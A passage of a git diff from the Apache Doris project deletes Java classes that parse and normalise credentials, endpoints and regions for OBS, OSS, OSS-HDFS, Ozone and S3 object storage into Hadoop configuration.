with s3a well; prefer native OBSFileSystem if available on the classpath - if (OBS_FILE_SYSTEM_AVAILABLE) { - hadoopConfigMap.put("fs.obs.impl", "org.apache.hadoop.fs.obs.OBSFileSystem"); - hadoopConfigMap.put("fs.AbstractFileSystem.obs.impl", "org.apache.hadoop.fs.obs.OBS"); - } else { - hadoopConfigMap.put("fs.obs.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); - } - hadoopConfigMap.put("fs.obs.access.key", accessKey); - hadoopConfigMap.put("fs.obs.secret.key", secretKey); - hadoopConfigMap.put("fs.obs.endpoint", endpoint); - } - - protected void setEndpointIfPossible() { - super.setEndpointIfPossible(); - if (StringUtils.isBlank(getEndpoint())) { - throw new IllegalArgumentException("Property obs.endpoint is required."); - } - } - - @Override - protected Set schemas() { - return ImmutableSet.of("obs"); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java deleted file mode 100644 index f077dc78cc2881..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java +++ /dev/null @@ -1,217 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.collect.ImmutableSet; -import lombok.Setter; -import org.apache.commons.lang3.StringUtils; - -import java.net.URI; -import java.util.LinkedHashMap; -import java.util.Map; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Matcher; -import java.util.regex.Pattern; - -/** - * todo - * Should consider using the same class as DLF Properties. - * Configuration properties for OSS-HDFS. - * - *

      Important: It is recommended to use the "oss.hdfs" prefix for all OSS-related - * configuration properties instead of the standalone "oss" prefix. - * This is because when both "oss" and "oss.hdfs" prefixed parameters are provided simultaneously, - * the system cannot distinguish which parameter belongs to which prefix, leading to ambiguity and confusion. - * To prevent such conflicts, the standalone "oss" prefix is planned to be fully deprecated in the future. - * - *

      Users should migrate their configurations to use the "oss.hdfs" prefix to ensure clarity - * and future compatibility. - */ -public class OSSHdfsProperties extends HdfsCompatibleProperties { - - @Setter - @ConnectorProperty(names = {"oss.hdfs.endpoint", "oss.endpoint", - "dlf.endpoint", "dlf.catalog.endpoint"}, - description = "The endpoint of OSS.") - protected String endpoint = ""; - - @ConnectorProperty(names = {"oss.hdfs.access_key", "oss.access_key", "dlf.access_key", "dlf.catalog.accessKeyId"}, - sensitive = true, - description = "The access key of OSS.") - protected String accessKey = ""; - - @ConnectorProperty(names = {"oss.hdfs.secret_key", "oss.secret_key", "dlf.secret_key", "dlf.catalog.secret_key"}, - sensitive = true, - description = "The secret key of OSS.") - protected String secretKey = ""; - - @ConnectorProperty(names = {"oss.hdfs.region", "oss.region", "dlf.region"}, - required = false, - description = "The region of OSS.") - protected String region; - - @ConnectorProperty(names = {"oss.hdfs.fs.defaultFS"}, required = false, description = "") - protected String fsDefaultFS = ""; - - @ConnectorProperty(names = {"oss.hdfs.hadoop.config.resources"}, - required = false, - description = "The xml files of Hadoop configuration.") - protected String hadoopConfigResources = ""; - - /** - * TODO: Do not expose to users for now. - * Mutual exclusivity between parameters should be validated at the framework level - * to prevent messy, repetitive checks in application code. - */ - @ConnectorProperty(names = {"oss.hdfs.security_token", "oss.security_token"}, required = false, - description = "The security token of OSS.") - protected String securityToken = ""; - - private static final Set OSS_ENDPOINT_KEY_NAME = ImmutableSet.of("oss.hdfs.endpoint", "oss.endpoint", - "dlf.endpoint", "dlf.catalog.endpoint"); - - private Map backendConfigProperties; - - private static final Set ENDPOINT_PATTERN = ImmutableSet.of(Pattern - .compile("(?:https?://)?([a-z]{2}-[a-z0-9-]+)\\.oss-dls\\.aliyuncs\\.com"), - Pattern.compile("^(?:https?://)?dlf(?:-vpc)?\\.([a-z0-9-]+)\\.aliyuncs\\.com(?:/.*)?$")); - - private static final Set supportSchema = ImmutableSet.of("oss", "hdfs"); - - protected OSSHdfsProperties(Map origProps) { - super(Type.OSS_HDFS, origProps); - } - - private static final String OSS_HDFS_PREFIX_KEY = "oss.hdfs."; - - public static boolean guessIsMe(Map props) { - boolean enable = props.entrySet().stream() - .anyMatch(e -> e.getKey().equalsIgnoreCase(OSS_HDFS_PREFIX_KEY) && Boolean.parseBoolean(e.getValue())); - if (enable) { - return true; - } - String endpoint = OSS_ENDPOINT_KEY_NAME.stream() - .map(props::get) - .filter(ep -> StringUtils.isNotBlank(ep) && ep.endsWith(OSS_HDFS_ENDPOINT_SUFFIX)) - .findFirst() - .orElse(null); - return StringUtils.isNotBlank(endpoint); - } - - @Override - protected void checkRequiredProperties() { - super.checkRequiredProperties(); - } - - private void convertDlfToOssEndpointIfNeeded() { - if (this.endpoint.contains("dlf")) { - // If the endpoint already contains "oss-dls.aliyuncs.com", return it as is. - this.endpoint = this.region + ".oss-dls.aliyuncs.com"; - } - } - - public static Optional extractRegion(String endpoint) { - for (Pattern pattern : ENDPOINT_PATTERN) { - Matcher matcher = pattern.matcher(endpoint.toLowerCase()); - if (matcher.matches()) { - return Optional.ofNullable(matcher.group(1)); - } - } - return Optional.empty(); - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - // Extract region from the endpoint, e.g., "cn-shanghai.oss-dls.aliyuncs.com" -> "cn-shanghai" - if (StringUtils.isBlank(this.region)) { - Optional regionOptional = extractRegion(endpoint); - if (!regionOptional.isPresent()) { - throw new IllegalArgumentException("The region extracted from the endpoint is empty. " - + "Please check the endpoint format: {} or set oss.region" + endpoint); - } - this.region = regionOptional.get(); - } - convertDlfToOssEndpointIfNeeded(); - if (StringUtils.isBlank(fsDefaultFS)) { - this.fsDefaultFS = HdfsPropertiesUtils.extractDefaultFsFromUri(origProps, supportSchema); - } - initConfigurationParams(); - } - - private static final String OSS_HDFS_ENDPOINT_SUFFIX = ".oss-dls.aliyuncs.com"; - - @Override - public Map getBackendConfigProperties() { - return backendConfigProperties; - } - - private void initConfigurationParams() { - // TODO: Currently we load all config parameters and pass them to the BE directly. - // In the future, we should pass the path to the configuration directory instead, - // and let the BE load the config file on its own. - Map config = loadConfigFromFile(hadoopConfigResources); - config.put("fs.oss.endpoint", endpoint); - config.put("fs.oss.accessKeyId", accessKey); - config.put("fs.oss.accessKeySecret", secretKey); - config.put("fs.oss.region", region); - config.put("fs.oss.impl", OSSProperties.JINDO_OSS_FILE_SYSTEM_IMPL); - config.put("fs.AbstractFileSystem.oss.impl", OSSProperties.JINDO_OSS_ABSTRACT_FILE_SYSTEM_IMPL); - if (StringUtils.isNotBlank(fsDefaultFS)) { - config.put(HDFS_DEFAULT_FS_NAME, fsDefaultFS); - } - this.backendConfigProperties = config; - this.hadoopConfigMap = new LinkedHashMap<>(); - this.backendConfigProperties.forEach(hadoopConfigMap::put); - } - - @Override - public String validateAndNormalizeUri(String url) throws StoragePropertiesException { - return validateUri(url); - } - - @Override - public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { - String uri = loadProps.get("uri"); - return validateUri(uri); - } - - private String validateUri(String uri) throws StoragePropertiesException { - if (StringUtils.isBlank(uri)) { - throw new StoragePropertiesException("The uri is empty."); - } - URI uriObj = URI.create(uri); - if (uriObj.getScheme() == null) { - throw new StoragePropertiesException("The uri scheme is empty."); - } - if (!uriObj.getScheme().equalsIgnoreCase("oss")) { - throw new StoragePropertiesException("The uri scheme is not oss."); - } - return uriObj.toString(); - } - - @Override - public String getStorageName() { - return "OSSHDFS"; - } - -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java deleted file mode 100644 index 5511f6e0b915be..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java +++ /dev/null @@ -1,380 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.annotations.VisibleForTesting; -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; -import org.apache.commons.lang3.BooleanUtils; -import org.apache.commons.lang3.StringUtils; - -import java.net.URI; -import java.net.URISyntaxException; -import java.util.Arrays; -import java.util.List; -import java.util.Map; -import java.util.Objects; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Pattern; -import java.util.stream.Stream; - -public class OSSProperties extends AbstractS3CompatibleProperties { - - @Setter - @Getter - @ConnectorProperty(names = {"oss.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT", "dlf.endpoint", - "dlf.catalog.endpoint", "fs.oss.endpoint"}, - required = false, - description = "The endpoint of OSS.") - protected String endpoint = ""; - - @Getter - @ConnectorProperty(names = {"oss.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", - "ACCESS_KEY", "dlf.access_key", "dlf.catalog.accessKeyId", "fs.oss.accessKeyId"}, - required = false, - sensitive = true, - description = "The access key of OSS.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"oss.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", - "secret_key", "SECRET_KEY", - "dlf.secret_key", "dlf.catalog.secret_key", "fs.oss.accessKeySecret"}, - required = false, - sensitive = true, - description = "The secret key of OSS.") - protected String secretKey = ""; - - @Getter - @Setter - @ConnectorProperty(names = {"oss.region", "s3.region", "AWS_REGION", "region", "REGION", "dlf.region", - "iceberg.rest.signing-region"}, - required = false, - isRegionField = true, - description = "The region of OSS.") - protected String region; - - @ConnectorProperty(names = {"dlf.access.public", "dlf.catalog.accessPublic"}, - required = false, - description = "Enable public access to Aliyun DLF.") - protected String dlfAccessPublic = "false"; - - @Getter - @ConnectorProperty(names = {"oss.session_token", "s3.session_token", "s3.session-token", "session_token", - "fs.oss.securityToken", "AWS_TOKEN"}, - required = false, - sensitive = true, - description = "The session token of OSS.") - protected String sessionToken = ""; - - /** - * The maximum number of concurrent connections that can be made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"oss.connection.maximum", "s3.connection.maximum"}, required = false, - description = "Maximum number of connections.") - protected String maxConnections = "100"; - - /** - * The timeout (in milliseconds) for requests made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"oss.connection.request.timeout", "s3.connection.request.timeout"}, required = false, - description = "Request timeout in seconds.") - protected String requestTimeoutS = "10000"; - - /** - * The timeout (in milliseconds) for establishing a connection to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"oss.connection.timeout", "s3.connection.timeout"}, required = false, - description = "Connection timeout in seconds.") - protected String connectionTimeoutS = "10000"; - - /** - * Flag indicating whether to use path-style URLs for the object storage system. - * This value is optional and can be configured by the user. - */ - @Setter - @Getter - @ConnectorProperty(names = {"oss.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - - @ConnectorProperty(names = {"oss.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, - description = "Whether to use path style URL for the storage.") - @Setter - @Getter - protected String forceParsingByStandardUrl = "false"; - - private static final Pattern STANDARD_ENDPOINT_PATTERN = Pattern - .compile("^(?:https?://)?(?:s3\\.)?oss-([a-z0-9-]+?)(?:-internal)?\\.aliyuncs\\.com$"); - - /** - * Pattern to extract the region from an Alibaba Cloud OSS endpoint. - *

      - * Supported formats: aliyun oss? - * - oss-cn-hangzhou.aliyuncs.com => region = cn-hangzhou - * - ... => region = cn-shanghai - * - oss-cn-beijing-internal.aliyuncs.com => region = cn-beijing (internal endpoint) - * - ... => region = cn-shenzhen - *

      - * Group(1) captures the region name (e.g., cn-hangzhou). - *

      - * Support S3 compatible endpoints:... - * - s3.cn-hangzhou.aliyuncs.com => region = cn-hangzhou - *

      - * https://help.aliyun.com/zh/dlf/dlf-1-0/developer-reference/api-datalake-2020-07-10-endpoint - * - datalake.cn-hangzhou.aliyuncs.com => region = cn-hangzhou - */ - public static final Set ENDPOINT_PATTERN = ImmutableSet.of(STANDARD_ENDPOINT_PATTERN, - Pattern.compile("^(?:https?://)?dlf(?:-vpc)?\\.([a-z0-9-]+)\\.aliyuncs\\.com(?:/.*)?$"), - Pattern.compile("^(?:https?://)?datalake(?:-vpc)?\\.([a-z0-9-]+)\\.aliyuncs\\.com(?:/.*)?$")); - - private static final List URI_KEYWORDS = Arrays.asList("uri", "warehouse"); - - private static List DLF_TYPE_KEYWORDS = Arrays.asList("hive.metastore.type", - "iceberg.catalog.type", "paimon.catalog.type"); - - static final String JINDO_OSS_FILE_SYSTEM_IMPL = "com.aliyun.jindodata.oss.JindoOssFileSystem"; - static final String JINDO_OSS_ABSTRACT_FILE_SYSTEM_IMPL = "com.aliyun.jindodata.oss.JindoOSS"; - - private static final String DLS_URI_KEYWORDS = "oss-dls.aliyuncs"; - - protected OSSProperties(Map origProps) { - super(Type.OSS, origProps); - } - - public static OSSProperties of(Map properties) { - OSSProperties propertiesObj = new OSSProperties(properties); - ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); - propertiesObj.initNormalizeAndCheckProps(); - propertiesObj.initializeHadoopStorageConfig(); - return propertiesObj; - } - - protected static boolean guessIsMe(Map origProps) { - String value = Stream.of("oss.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT", - "dlf.endpoint", "dlf.catalog.endpoint", "fs.oss.endpoint", "fs.oss.accessKeyId") - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - if (StringUtils.isNotBlank(value)) { - if (value.contains(DLS_URI_KEYWORDS)) { - return false; - } - return (value.contains("aliyuncs.com")); - } - - value = Stream.of("oss.region") - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - if (StringUtils.isNotBlank(value)) { - return true; - } - if (isDlfMSType(origProps)) { - return true; - } - Optional uriValue = origProps.entrySet().stream() - .filter(e -> URI_KEYWORDS.stream() - .anyMatch(key -> key.equalsIgnoreCase(e.getKey()))) - .map(Map.Entry::getValue) - .filter(Objects::nonNull) - .filter(OSSProperties::isKnownObjectStorage) - .findFirst(); - return uriValue.filter(OSSProperties::isKnownObjectStorage).isPresent(); - } - - private static boolean isKnownObjectStorage(String value) { - if (value == null) { - return false; - } - boolean isDls = value.contains(DLS_URI_KEYWORDS); - if (isDls) { - return false; - } - if (value.startsWith("oss://")) { - return true; - } - if (!value.contains("aliyuncs.com")) { - return false; - } - boolean isAliyunOss = (value.contains("oss-")); - boolean isAmazonS3 = value.contains("s3."); - return isAliyunOss || isAmazonS3; - } - - private static boolean isDlfMSType(Map params) { - return DLF_TYPE_KEYWORDS.stream() - .anyMatch(key -> params.containsKey(key) && StringUtils.isNotBlank(params.get(key)) - && StringUtils.equalsIgnoreCase("dlf", params.get(key))); - } - - @Override - protected void setEndpointIfPossible() { - if (StringUtils.isBlank(this.endpoint) && StringUtils.isNotBlank(this.region)) { - if (isDlfMSType(origProps)) { - this.endpoint = getOssEndpoint(region, BooleanUtils.toBoolean(dlfAccessPublic)); - } else { - Optional uriValueOpt = origProps.entrySet().stream() - .filter(e -> URI_KEYWORDS.stream() - .anyMatch(key -> key.equalsIgnoreCase(e.getKey()))) - .map(Map.Entry::getValue) - .filter(Objects::nonNull) - .filter(OSSProperties::isKnownObjectStorage) - .findFirst(); - if (uriValueOpt.isPresent()) { - String uri = uriValueOpt.get(); - // If the URI does not start with http(s), derive endpoint from region - // (http(s) URIs are handled by separate logic elsewhere) - if (!uri.startsWith("http://") && !uri.startsWith("https://")) { - this.endpoint = getOssEndpoint(region, BooleanUtils.toBoolean(dlfAccessPublic)); - } - } - } - } - super.setEndpointIfPossible(); - } - - @Override - public String validateAndNormalizeUri(String uri) throws StoragePropertiesException { - return super.validateAndNormalizeUri(rewriteOssBucketIfNecessary(uri)); - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - if (StringUtils.isBlank(endpoint) || !STANDARD_ENDPOINT_PATTERN.matcher(endpoint).matches()) { - this.endpoint = getOssEndpoint(region, BooleanUtils.toBoolean(dlfAccessPublic)); - } - } - - private static String getOssEndpoint(String region, boolean publicAccess) { - String prefix = "oss-"; - String suffix = ".aliyuncs.com"; - if (!publicAccess) { - suffix = "-internal" + suffix; - } - return prefix + region + suffix; - } - - @Override - protected Set endpointPatterns() { - return ENDPOINT_PATTERN; - } - - @Override - protected Set schemas() { - return ImmutableSet.of("oss"); - } - - @Override - public void initializeHadoopStorageConfig() { - super.initializeHadoopStorageConfig(); - hadoopConfigMap.put("fs.oss.impl", JINDO_OSS_FILE_SYSTEM_IMPL); - hadoopConfigMap.put("fs.AbstractFileSystem.oss.impl", JINDO_OSS_ABSTRACT_FILE_SYSTEM_IMPL); - hadoopConfigMap.put("fs.oss.accessKeyId", accessKey); - hadoopConfigMap.put("fs.oss.accessKeySecret", secretKey); - if (StringUtils.isNotBlank(sessionToken)) { - hadoopConfigMap.put("fs.oss.securityToken", sessionToken); - } - hadoopConfigMap.put("fs.oss.endpoint", endpoint); - hadoopConfigMap.put("fs.oss.region", region); - } - - /** - * Rewrites the bucket part of an OSS URI if the bucket is specified - * in the form of bucket.endpoint. https://help.aliyun.com/zh/oss/user-guide/access-oss-via-bucket-domain-name - * - *

      This method is designed for OSS usage, but it also supports - * the {@code s3://} scheme since OSS URIs are sometimes written - * using the S3-style scheme.

      - * - *

      HTTP and HTTPS URIs are returned unchanged.

      - * - *

      Examples: - *

      -     *   oss://bucket.endpoint/path  -> oss://bucket/path
      -     *   s3://bucket.endpoint        -> s3://bucket
      -     *   https://bucket.endpoint     -> unchanged
      -     * 
      - * - * @param uri the original URI string - * @return the rewritten URI string, or the original URI if no rewrite is needed - */ - @VisibleForTesting - protected static String rewriteOssBucketIfNecessary(String uri) { - if (uri == null || uri.isEmpty()) { - return uri; - } - - URI parsed; - try { - parsed = URI.create(uri); - } catch (IllegalArgumentException e) { - // Invalid URI, do not rewrite - return uri; - } - - String scheme = parsed.getScheme(); - if ("http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme)) { - return uri; - } - - // For non-standard schemes (oss / s3), authority is more reliable than host - String authority = parsed.getAuthority(); - if (authority == null || authority.isEmpty()) { - return uri; - } - - // Handle bucket.endpoint format - int dotIndex = authority.indexOf('.'); - if (dotIndex <= 0) { - return uri; - } - - String bucket = authority.substring(0, dotIndex); - - try { - URI rewritten = new URI( - scheme, - bucket, - parsed.getPath(), - parsed.getQuery(), - parsed.getFragment() - ); - return rewritten.toString(); - } catch (URISyntaxException e) { - // Be conservative: fallback to original URI - return uri; - } - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java deleted file mode 100644 index 3844d319a9c058..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java +++ /dev/null @@ -1,50 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -/** - * Interface representing the properties and configurations for object storage systems. - * This interface provides methods for converting the storage properties to specific - * configurations for different protocols, such as Hadoop HDFS and AWS S3. - */ -public interface ObjectStorageProperties { - - String getEndpoint(); - - String getRegion(); - - String getAccessKey(); - - String getSecretKey(); - - void setEndpoint(String endpoint); - - void setRegion(String region); - - String getSessionToken(); - - String getMaxConnections(); - - String getRequestTimeoutS(); - - String getConnectionTimeoutS(); - - String getUsePathStyle(); - - String getForceParsingByStandardUrl(); -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java deleted file mode 100644 index 30cb9ae47bec22..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java +++ /dev/null @@ -1,153 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; - -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; -import org.apache.commons.lang3.StringUtils; - -import java.util.Map; -import java.util.Set; -import java.util.regex.Pattern; - -public class OzoneProperties extends AbstractS3CompatibleProperties { - - @Setter - @Getter - @ConnectorProperty(names = {"ozone.endpoint", "s3.endpoint"}, - required = false, - description = "The endpoint of Ozone S3 Gateway.") - protected String endpoint = ""; - - @Setter - @Getter - @ConnectorProperty(names = {"ozone.region", "s3.region"}, - required = false, - description = "The region of Ozone S3 Gateway.") - protected String region = "us-east-1"; - - @Getter - @ConnectorProperty(names = {"ozone.access_key", "s3.access_key", "s3.access-key-id"}, - required = false, - sensitive = true, - description = "The access key of Ozone S3 Gateway.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"ozone.secret_key", "s3.secret_key", "s3.secret-access-key"}, - required = false, - sensitive = true, - description = "The secret key of Ozone S3 Gateway.") - protected String secretKey = ""; - - @Getter - @ConnectorProperty(names = {"ozone.session_token", "s3.session_token", "s3.session-token"}, - required = false, - sensitive = true, - description = "The session token of Ozone S3 Gateway.") - protected String sessionToken = ""; - - @Getter - @ConnectorProperty(names = {"ozone.connection.maximum", "s3.connection.maximum"}, - required = false, - description = "Maximum number of connections.") - protected String maxConnections = "100"; - - @Getter - @ConnectorProperty(names = {"ozone.connection.request.timeout", "s3.connection.request.timeout"}, - required = false, - description = "Request timeout in seconds.") - protected String requestTimeoutS = "10000"; - - @Getter - @ConnectorProperty(names = {"ozone.connection.timeout", "s3.connection.timeout"}, - required = false, - description = "Connection timeout in seconds.") - protected String connectionTimeoutS = "10000"; - - @Setter - @Getter - @ConnectorProperty(names = {"ozone.use_path_style", "use_path_style", "s3.path-style-access"}, - required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "true"; - - @Setter - @Getter - @ConnectorProperty(names = {"ozone.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, - required = false, - description = "Whether to use path style URL for the storage.") - protected String forceParsingByStandardUrl = "false"; - - protected OzoneProperties(Map origProps) { - super(Type.OZONE, origProps); - } - - @Override - public void initNormalizeAndCheckProps() { - hydrateFromOriginalProps(); - super.initNormalizeAndCheckProps(); - hydrateFromOriginalProps(); - } - - private void hydrateFromOriginalProps() { - endpoint = StringUtils.firstNonBlank( - endpoint, - origProps.get("ozone.endpoint"), - origProps.get("s3.endpoint")); - region = StringUtils.firstNonBlank(region, origProps.get("ozone.region"), origProps.get("s3.region")); - accessKey = StringUtils.firstNonBlank( - accessKey, - origProps.get("ozone.access_key"), - origProps.get("s3.access_key"), - origProps.get("s3.access-key-id")); - secretKey = StringUtils.firstNonBlank( - secretKey, - origProps.get("ozone.secret_key"), - origProps.get("s3.secret_key"), - origProps.get("s3.secret-access-key")); - sessionToken = StringUtils.firstNonBlank(sessionToken, origProps.get("ozone.session_token"), - origProps.get("s3.session_token"), origProps.get("s3.session-token")); - usePathStyle = StringUtils.firstNonBlank(usePathStyle, origProps.get("ozone.use_path_style"), - origProps.get("use_path_style"), origProps.get("s3.path-style-access")); - forceParsingByStandardUrl = StringUtils.firstNonBlank(forceParsingByStandardUrl, - origProps.get("ozone.force_parsing_by_standard_uri"), - origProps.get("force_parsing_by_standard_uri")); - } - - @Override - protected Set endpointPatterns() { - return ImmutableSet.of(Pattern.compile("^(?:https?://)?[a-zA-Z0-9.-]+(?::\\d+)?$")); - } - - @Override - protected void setEndpointIfPossible() { - super.setEndpointIfPossible(); - if (StringUtils.isBlank(getEndpoint())) { - throw new IllegalArgumentException("Property ozone.endpoint is required."); - } - } - - @Override - protected Set schemas() { - return ImmutableSet.of("s3", "s3a", "s3n"); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java deleted file mode 100644 index 4449dcf5b8e4ba..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java +++ /dev/null @@ -1,358 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.property.common.AwsCredentialsProviderMode; - -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; -import org.apache.commons.lang3.StringUtils; - -import java.util.Map; -import java.util.Objects; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Pattern; -import java.util.stream.Stream; - -public class S3Properties extends AbstractS3CompatibleProperties { - - public static final String USE_PATH_STYLE = "use_path_style"; - public static final String ENDPOINT = "s3.endpoint"; - public static final String REGION = "s3.region"; - public static final String ROLE_ARN = "s3.role_arn"; - public static final String EXTERNAL_ID = "s3.external_id"; - public static final String CREDENTIALS_PROVIDER_TYPE = "s3.credentials_provider_type"; - - private static final String[] ENDPOINT_NAMES_FOR_GUESSING = { - "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", "glue.endpoint", - "aws.glue.endpoint" - }; - - private static final String[] REGION_NAMES_FOR_GUESSING = { - "s3.region", "glue.region", "aws.glue.region", "iceberg.rest.signing-region", - "rest.signing-region", "client.region" - }; - - @Setter - @Getter - @ConnectorProperty(names = {ENDPOINT, "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", "glue.endpoint", - "aws.glue.endpoint"}, - required = false, - description = "The endpoint of S3.") - protected String endpoint = ""; - - @Setter - @Getter - @ConnectorProperty(names = {REGION, "AWS_REGION", "region", "REGION", "aws.region", "glue.region", - "aws.glue.region", "iceberg.rest.signing-region", "rest.signing-region", "client.region"}, - required = false, - isRegionField = true, - description = "The region of S3.") - protected String region = ""; - - @Getter - @ConnectorProperty(names = {"s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", "glue.access_key", - "aws.glue.access-key", "client.credentials-provider.glue.access_key", "iceberg.rest.access-key-id", - "s3.access-key-id"}, - required = false, - sensitive = true, - description = "The access key of S3. Optional for anonymous access to public datasets.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", "glue.secret_key", - "aws.glue.secret-key", "client.credentials-provider.glue.secret_key", "iceberg.rest.secret-access-key", - "s3.secret-access-key"}, - required = false, - sensitive = true, - description = "The secret key of S3. Optional for anonymous access to public datasets.") - protected String secretKey = ""; - - @Getter - @ConnectorProperty(names = {"s3.session_token", "session_token", "s3.session-token", "AWS_TOKEN", - "iceberg.rest.session-token"}, - required = false, - description = "The session token of S3.") - protected String sessionToken = ""; - - @Getter - @ConnectorProperty(names = {"s3.session-token-token-expires-at-ms"}, - required = false, - description = "The session token expiration time in milliseconds since epoch.") - protected String sessionTokenExpiresAtMs = ""; - - @Getter - @ConnectorProperty(names = {"s3.connection.maximum", - "AWS_MAX_CONNECTIONS"}, - required = false, - description = "The maximum number of connections to S3.") - protected String 